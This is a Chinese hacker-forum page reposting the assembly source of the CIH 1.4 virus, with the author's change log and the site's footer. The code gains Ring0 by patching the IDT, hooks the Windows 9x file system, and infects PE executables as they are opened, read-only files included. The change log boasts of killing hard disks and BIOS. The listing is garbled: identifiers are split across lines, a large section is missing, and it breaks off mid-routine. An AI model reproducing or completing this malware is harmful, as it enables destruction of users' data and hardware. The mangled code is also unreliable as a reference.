08
2008
08

CIH 1.4源程序

 信息来源:黑客防线

; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; *
*
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; *
*
; *==========================================================================*
; * Modification History
*
; *==========================================================================*
; * v1.0 1. Create the Virus Program.
*
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
*
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infectit. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************


.586P

 

; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section)*
; ****************************************************************************


OriginalAppEXE SEGMENT

 

FileHeader:

db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h

db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h

db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh

db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h

db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h

db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh

db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh

db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h

db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah

db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h

db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h

db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h

db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h

db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

dd 00000000h, VirusSize

 

lea ecx, StopToRunVirusCode-@0[ebx]

push ecx

 

push eax

 

; *************************************

; * Let's Modify *

; * IDT(Interrupt Descriptor Table) *

; * to Get Ring0 Privilege... *

; *************************************

 

push eax ;

sidt [esp-02h] ; Get IDT Base Address

pop ebx ;

 

add ebx, HookExceptionNumber*08h+04h ; ZF
= 0


cli

 

mov ebp, [ebx] ; Get Exception Base

mov bp, [ebx-04h] ; Entry Point

 

lea esi, MyExceptionHook-@1[ecx]

 

push esi

 

mov [ebx-04h], si ;

shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address


pop esi

 

; *************************************

; * Generate Exception to Get Ring0 *

; *************************************

 

int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $

 

; *************************************

; * Merge All Virus Code Section *

; *************************************

 

; *************************************

; * Generate Exception Again *

; *************************************

 

int HookExceptionNumber ; GenerateExce
ption Aga

 


; *************************************

; * Let's Restore *

; * Structured Exception Handing *

; *************************************

 

ReadyRestoreSE:

sti

xor ebx, ebx

jmp RestoreSE

; *************************************

; * When Exception Error Occurs, *

; * Our OS System should be in NT. *

; * So My Cute Virus will not *

; * Continue to Run, it Jmups to *

; * Original Application to Run. *

; *************************************

 

StopToRunVirusCode:

@1 = StopToRunVirusCode

 

xor ebx, ebx

mov eax, fs:[ebx]

mov esp, [eax]

 

RestoreSE:

pop dword ptr fs:[ebx]

pop eax

 

; *************************************

; * Return Original App to Execute *

; *************************************

 

pop ebp

 

push 00401000h ; Push Original

OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack


ret ; Return to Original App Entry Point

 

; *********************************************************

; * Ring0 Virus Game Initial Program *

; *********************************************************

 

MyExceptionHook:

@2 = MyExceptionHook

 

jz InstallMyFileSystemApiHook

 

; *************************************

; * Do My Virus Exist in System !? *

; *************************************

 

mov ecx, dr0

jecxz AllocateSystemMemoryPage

 

add dword ptr [esp], ReadyRestoreSE-Return
AddressOf
dException

 

; *************************************

; * Return to Ring3 Initial Program *

; *************************************

 

ExitRing0Init:

mov [ebx-04h], bp ;

shr ebp, 16 ; Restore Exception

mov [ebx+02h], bp ;

 

iretd

 

; *************************************

; * Allocate SystemMemory Page to Use *

; *************************************

 

AllocateSystemMemoryPage:

 

mov dr0, ebx ; Set the Mark of My V
irus Exis
in System

 

push 00000000fh ;

push ecx ;

push 0ffffffffh ;

push ecx ;

push ecx ;

push ecx ;

push 000000001h ;

push 000000002h ;

int 20h ; VMMCALL _PageAllocat
e
_PageAllocate = $ ;

dd 00010053h ; Use EAX, ECX, EDX, a
nd flags
add esp, 08h*04h

 

xchg edi, eax ; EDI = SystemMemory S
tart Addr
s

 

lea eax, MyVirusStart-@2[esi]

 

iretd ; Return to Ring3 Initial Program

 

; *************************************

; * Install My File System Api Hook *

; *************************************

 

InstallMyFileSystemApiHook:

 

lea eax, FileSystemApiHook-@6[edi]

 

push eax ;

int 20h ; VXDCALL IFSMgr_InstallFileSyste
mApiHook
IFSMgr_InstallFileSystemApiHook = $ ;

dd 00400067h ; Use EAX, ECX, EDX, a
nd flags


mov dr0, eax ; Save OldFileSystemAp
iHook Add
ss

 

pop eax ; EAX = FileSystemApiHook Addr
ess


; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]
mov edx, [ecx]

mov OldInstallFileSystemApiHook-@3[eax], e
dx


; Modify IFSMgr_InstallFileSystemApiHook Entry
Point
lea eax, InstallFileSystemApiHook-@3[eax]

mov [ecx], eax

 

cli

 

jmp ExitRing0Init

 

; *********************************************************

; * Code Size of Merge Virus Code Section *

; *********************************************************

 

CodeSizeOfMergeVirusCodeSection = offset $

 

; *********************************************************

; * IFSMgr_InstallFileSystemApiHook *

; *********************************************************

 

InstallFileSystemApiHook:

push ebx

 

call @4 ;

@4: ;

pop ebx ; mov ebx, offset FileSystemAp
iHook
add ebx, FileSystemApiHook-@4 ;

 

push ebx

int 20h ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook
IFSMgr_RemoveFileSystemApiHook = $

dd 00400068h ; Use EAX, ECX, EDX, a
nd flags
pop eax

 

; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link Client FileSystemApiHook

push dword ptr [esp+8]

call OldInstallFileSystemApiHook-@3[ebx]

pop ecx

 

push eax

 

; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link My FileSystemApiHook

push ebx

call OldInstallFileSystemApiHook-@3[ebx]

pop ecx

 

mov dr0, eax ; Adjust OldFileSystem
ApiHook A
ress

 

pop eax

 

pop ebx

 

ret

 

; *********************************************************

; * Static Data *

; *********************************************************

 

OldInstallFileSystemApiHook dd ?

 

; *********************************************************

; * IFSMgr_FileSystemHook *

; *********************************************************

 

; *************************************

; * IFSMgr_FileSystemHook Entry Point *

; *************************************

 

FileSystemApiHook:

@3 = FileSystemApiHook

 

pushad

 

call @5 ;

@5: ;

pop esi ; mov esi, offset VirusGameDat
aStartAdd
ss

add esi, VirusGameDataStartAddress-@5

 

; *************************************

; * Is OnBusy !? *

; *************************************

 

test byte ptr (OnBusy-@6)[esi], 01h ; if (
OnBusy )
jnz pIFSFunc ; goto
pIFSFunc


; *************************************

; * Is OpenFile !? *

; *************************************

 

; if ( NotOpenFile )

; goto prevhook

lea ebx, [esp+20h+04h+04h]

cmp dword ptr [ebx], 00000024h

jne prevhook

 

; *************************************

; * Enable OnBusy *

; *************************************

 

inc byte ptr (OnBusy-@6)[esi] ; Enab
le OnBusy


; *************************************

; * Get FilePath's DriveNumber, *

; * then Set the DriveName to *

; * FileNameBuffer. *

; *************************************

; * Ex. If DriveNumber is 03h, *

; * DriveName is 'C:'. *

; *************************************

 

; mov esi, offset FileNameBuffer

add esi, FileNameBuffer-@6

 

push esi

 

mov al, [ebx+04h]

cmp al, 0ffh

je CallUniToBCSPath

 

add al, 40h

mov ah, ':'

 

mov [esi], eax

 

inc esi

inc esi

 

; *************************************

; * UniToBCSPath *

; *************************************

; * This Service Converts *

; * a Canonicalized Unicode Pathname *

; * to a Normal Pathname in the *

; * Specified BCS Character Set. *

; *************************************

 

CallUniToBCSPath:

push 00000000h

push FileNameBufferSize

mov ebx, [ebx+10h]

mov eax, [ebx+0ch]

add eax, 04h

push eax

push esi

int 20h ; VXDCall UniToBCSPath

UniToBCSPath = $

dd 00400041h

add esp, 04h*04h

 

; *************************************

; * Is FileName '.EXE' !? *

; *************************************

 

; cmp [esi+eax-04h], '.EXE'

cmp [esi+eax-04h], 'EXE.'

pop esi

jne DisableOnBusy

 

IF DEBUG

 

; *************************************

; * Only for Debug *

; *************************************

 

; cmp [esi+eax-06h], 'FUCK'

cmp [esi+eax-06h], 'KCUF'

jne DisableOnBusy

 

ENDIF

 

; *************************************

; * Is Open Existing File !? *

; *************************************

 

; if ( NotOpenExistingFile )

; goto DisableOnBusy

cmp word ptr [ebx+18h], 01h

jne DisableOnBusy

 

; *************************************

; * Get Attributes of the File *

; *************************************

 

mov ax, 4300h

int 20h ; VXDCall IFSMgr_Ring0_FileIO

IFSMgr_Ring0_FileIO = $

dd 00400032h

 

jc DisableOnBusy

 

push ecx

 

; *************************************

; * Get IFSMgr_Ring0_FileIO Address *

; *************************************

 

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7
)[esi]
mov edi, [edi]

 

; *************************************

; * Is Read-Only File !? *

; *************************************

 

test cl, 01h

jz OpenFile

 

; *************************************

; * Modify Read-Only File to Write *

; *************************************

 

mov ax, 4301h

xor ecx, ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; *************************************

; * Open File *

; *************************************

 

OpenFile:

xor eax, eax

mov ah, 0d5h

xor ecx, ecx

xor edx, edx

inc edx

mov ebx, edx

inc ebx

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

xchg ebx, eax ; mov ebx, FileHandle

 

; *************************************

; * Need to Restore *

; * Attributes of the File !? *

; *************************************

 

pop ecx

 

pushf

 

test cl, 01h

jz IsOpenFileOK

 

; *************************************

; * Restore Attributes of the File *

; *************************************

 

mov ax, 4301h

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; *************************************

; * Is Open File OK !? *

; *************************************

 

IsOpenFileOK:

popf

 

jc DisableOnBusy

 

; *************************************

; * Open File Already Succeed. ^__^ *

; *************************************

 

push esi ; Push FileNameBuffer Address
to Stack


pushf ; Now CF = 0, Push Flag to Sta
ck


add esi, DataBuffer-@7 ; mov esi, offset D
ataBuffer


; ***************************

; * Get OffsetToNewHeader *

; ***************************

 

xor eax, eax

mov ah, 0d6h

 

; For Doing Minimal VirusCode's Length,

; I Save EAX to EBP.

mov ebp, eax

 

push 00000004h

pop ecx

push 0000003ch

pop edx

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; * EDX = 'PE{threadcontent}{threadcontent}' Signature of *

; * ImageFileHeader Pointer's *

; * Former Byte. *

; * ESI = DataBuffer Address ==> @8 *

; * EDI = IFSMgr_Ring0_FileIO Address *

; * EBP = D600h ==> Read Data in File *

; *************************************

; * Stack Dump : *

; * *

; * ESP => ------------------------- *

; * | EFLAG(CF=0) | *

; * ------------------------- *

; * | FileNameBufferPointer | *

; * ------------------------- *

; * | EDI | *

; * ------------------------- *

; * | ESI | *

; * ------------------------- *

; * | EBP | *

; * ------------------------- *

; * | ESP | *

; * ------------------------- *

; * | EBX | *

; * ------------------------- *

; * | EDX | *

; * ------------------------- *

; * | ECX | *

; * ------------------------- *

; * | EAX | *

; * ------------------------- *

; * | Return Address | *

; * ------------------------- *

; *************************************

 

push ebx ; Save File Handle

 

push 00h ; Set VirusCodeSectionTableEnd
Mark


; ***************************

; * Let's Set the *

; * Virus' Infected Mark *

; ***************************

 

push 01h ; Size

push edx ; Pointer of File

push edi ; Address of Buffer

 

; ***************************

; * Save ESP Register *

; ***************************

 

mov dr1, esp

 

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Only First Set Size ) *

; ***************************

 

push eax ; Size

 

; ***************************

; * Let's Read *

; * Image Header in File *

; ***************************

 

mov eax, ebp

mov cl, SizeOfImageHeaderToRead

add edx, 07h ; Move EDX to NumberOfSection
s
call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Set Pointer of File, *

; * Address of Buffer ) *

; ***************************

 

lea eax, (AddressOfEntryPoint-@8)[edx]

push eax ; Pointer of File

 

lea eax, (NewAddressOfEntryPoint-@8)[esi]

push eax ; Address of Buffer

 

; ***************************

; * Move EDX to the Start *

; * of SectionTable in File *

; ***************************

 

movzx eax, word ptr (SizeOfOptionalHeader-@8
)[esi]
lea edx, [eax+edx+12h]

 

; ***************************

; * Let's Get *

; * Total Size of Sections *

; ***************************

 

mov al, SizeOfScetionTable

 

; I Assume NumberOfSections <= 0ffh

mov cl, (NumberOfSections-@8)[esi]

 

mul cl

 

; ***************************

; * Let's Set Section Table *

; ***************************

 

; Move ESI to the Start of SectionTable

lea esi, (StartOfSectionTable-@8)[esi]

 

push eax ; Size

push edx ; Pointer of File

push esi ; Address of Buffer

 

; ***************************

; * The Code Size of Merge *

; * Virus Code Section and *

; * Total Size of Virus *

; * Code Section Table Must *

; * be Small or Equal the *

; * Unused Space Size of *

; * Following Section Table *

; ***************************

 

inc ecx

push ecx ; Save NumberOfSections+1

 

shl ecx, 03h

push ecx ; Save TotalSizeOfVirusCodeSec
tionTable


add ecx, eax

add ecx, edx

 

sub ecx, (SizeOfHeaders-@9)[esi]

not ecx

inc ecx

 

; Save My Virus First Section Code

; Size of Following Section Table...

; ( Not Include the Size of Virus Code Section
Table )
push ecx

 

xchg ecx, eax ; ECX = Size of Sectio
n Table


; Save Original Address of Entry Point

mov eax, (AddressOfEntryPoint-@9)[esi]

add eax, (ImageBase-@9)[esi]

mov (OriginalAddressOfEntryPoint-@9)[esi],
eax


cmp word ptr [esp], small CodeSizeOfMergeV
irusCodeS
tion

jl OnlySetInfectedMark

 

; ***************************

; * Read All Section Tables *

; ***************************

 

mov eax, ebp

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; ***************************

; * Full Modify the Bug : *

; * WinZip Self-Extractor *

; * Occurs Error... *

; ***************************

; * So When User Opens *

; * WinZip Self-Extractor, *

; * Virus Doesn't Infect it.*

; ***************************

; * First, Virus Gets the *

; * PointerToRawData in the *

; * Second Section Table, *

; * Reads the Section Data, *

; * and Tests the String of *

; * 'WinZip(R)'...... *

; ***************************

 

xchg eax, ebp

 

push 00000004h

pop ecx

 

push edx

mov edx, (SizeOfScetionTable+PointerToRawD
ata-@9)[e
]

add edx, 12h

 

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; cmp [esi], 'nZip'

cmp dword ptr [esi], 'piZn'

je NotSetInfectedMark

 

pop edx

 

; ***************************

; * Let's Set Total Virus *

; * Code Section Table *

; ***************************

 

; EBX = My Virus First Section Code

; Size of Following Section Table

pop ebx

pop edi ; EDI = TotalSizeOfVirusCodeSe
ctionTabl
pop ecx ; ECX = NumberOfSections+1

 

push edi ; Size

 

add edx, ebp

push edx ; Pointer of File

 

add ebp, esi 
 
 

楼层 评论者 共有评论条数: 0   查看所有评论  【发表评论】 发表时间

当前无任何评论

 

 
 
   本类最新图片    latest pictures of this catalog
 
 
 
 
 
 
 
 
 
 
    友情链接    Friend Links
 
        
       
            
黑客焦点 贵阳天晴 佛山网安 西部网安 安康计算机 贵阳天晴 中国神话联盟 中国核客基地
追忆论坛 baker95935's blog 感恩中国          
 
 
 
 
 
  西安黑客联盟 ? 2006 
 


 
陕ICP备05003804号

站长统计  Powered by DiY-Page 3.5.3  [License] 
 
 

« 上一篇下一篇 »

相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。